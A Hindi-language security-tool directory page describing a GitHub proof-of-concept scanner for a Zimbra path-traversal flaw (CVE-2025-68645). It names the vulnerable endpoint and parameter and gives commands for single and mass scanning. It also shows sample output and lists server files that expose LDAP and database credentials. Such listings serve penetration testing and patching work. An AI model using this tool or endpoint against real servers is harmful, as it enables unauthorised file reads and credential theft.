Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Poc_CVE-2025-68645 — Zimbra Path Traversal (CVE-2025-68645) - Zimbra Collaboration Suite में अप्रमाणित फ़ाइल पढ़ने की कमजोरी | Kitploit
उपकरण/GitHubGitHub/harisaidhin/poc_cve-2025-68645
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - Zimbra Collaboration Suite में अप्रमाणित फ़ाइल पढ़ने की कमजोरी

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-68645 - Zimbra पथ ट्रैवर्सल भेद्यता

Security CVE Python License Status

📋 अवलोकन

CVE-2025-68645 एक पथ ट्रैवर्सल भेद्यता है Zimbra Collaboration Suite में जो अनधिकृत हमलावरों को सर्वर के फाइलसिस्टम से मनमानी फ़ाइलें पढ़ने की अनुमति देती है।

संवेदनशील एंडपॉइंट

/h/printconversations?javax.servlet.include.servlet_path=

🎯 प्रभाव

प्रभावगंभीरता
अनधिकृत फ़ाइल पढ़ना🔴 उच्च
कॉन्फ़िगरेशन प्रकटीकरण🔴 उच्च
क्रेडेंशियल लीकेज🔴 उच्च
आंतरिक नेटवर्क मैपिंग🟠 मध्यम

📁 पढ़ने योग्य फ़ाइलें

🚀 उपयोग

एकल लक्ष्य स्कैन

python CVE-2025-68645.py.py -t https://target.zimbra.com

बड़े पैमाने पर स्कैनिंग

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

उन्नत विकल्प

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 कमांड लाइन आर्गुमेंट्स

आर्गुमेंट विवरण डिफ़ॉल्ट -t, --target एकल लक्ष्य URL कोई नहीं -l, --list लक्ष्यों की सूची वाली फ़ाइल कोई नहीं -o, --output आउटपुट फ़ाइल नाम results.json --threads समवर्ती थ्रेड्स की संख्या 10 --timeout सेकंड में अनुरोध टाइमआउट 15 -v, --verbose विस्तृत आउटपुट सक्षम करें False --no-verify SSL सत्यापन अक्षम करें False --read-all सभी संवेदनशील पथ पढ़ें False

📸 उदाहरण आउटपुट

[*] स्कैन किया जा रहा है: https://target.zimbra.local [✓] असुरक्षित: https://target.zimbra.local [+] निकाला गया कॉन्फ़िगरेशन: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] मिला: /WEB-INF/web.xml [+] मिला: /opt/zimbra/conf/localconfig.xml [!] संभावित क्रेडेंशियल लीक हुए /WEB-INF/web.xml में

============================================================ स्कैन पूर्ण! बीता समय: 1.02 सेकंड कुल लक्ष्य: 1 असुरक्षित: 1 असुरक्षित नहीं: 0

टूल डाउनलोड करें
पथउजागर जानकारी
/WEB-INF/web.xmlसर्वलेट मैपिंग, सुरक्षा बाधाएँ
/WEB-INF/zcs.web.xmlZimbra-विशिष्ट कॉन्फ़िगरेशन
/opt/zimbra/conf/localconfig.xmlLDAP क्रेडेंशियल, डेटाबेस पासवर्ड
/opt/zimbra/conf/ldap-config.xmlLDAP सर्वर कॉन्फ़िगरेशन
/opt/zimbra/conf/attrs/zimbra-attrs.xmlसिस्टम विशेषताएँ
/WEB-INF/classes/logging.propertiesलॉगिंग कॉन्फ़िगरेशन